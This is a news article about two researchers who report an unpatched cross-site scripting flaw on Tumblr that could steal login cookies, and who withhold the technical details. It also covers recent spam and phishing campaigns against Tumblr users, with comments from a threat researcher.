Two researchers say they’ve found a security hole in Tumblr, one of the most popular sites on the Internet, that could steal users’ authentication cookies to break into their accounts.
Aditya Gupta and Subho Halder say they’ve tried to contact Tumblr about the vulnerability by using mail and Twitter, but so far no one has responded. The social sharing site hosts 59.4 million micro blogs and has published almost 25 billion posts.
The pair says they have identified a dangerous cross-site scripting vulnerability that poses risks for the site’s users, according to the site Softpedia.
“I could get the cookies of any user who visits my profile page. They are the actual Tumblr authentication cookies, which means I could use the cookies to log in to the respective user accounts,” Gupta said. “Also, I could make a complete worm out of it, so when one person views my profile, he would repost my post and everyone in his list who would see it would then be doing the same. All automatically and without the user’s knowledge.”
Gupta said he and Halder decided to tell people about the vulnerability after failing to get Tumblr’s attention but did not publicly release details to allow the site time to patch the flaw.
In May, Tumblr was hit by spam campaigns, including one designed to gain personally identifiable information through a fake dating site. Another attack posed as an outdated version of a Tumblr login page. A third scam promised to monetize users’ tumblelogs for a small fee.
“Tumblr continues to be a site that is well-trafficked by cybercriminals looking to victimize micro-bloggers with minimal effort,” said Christopher Boyd, senior threat researcher at GFI Software, in a news release. The company last week issued a report on the top threats in May that included those targeting Tumblr and Google Play users.
“More and more, cybercriminals are exploiting the familiarity of terms and images in order to distract the victim from the dangers that are present as they sign away their personal information and click on links that lead to nothing but trouble.”
Boyd added, “Cybercriminals are banking on the fact that social media users want to quickly share content and that they won’t thoroughly investigate links before spreading them to friends.”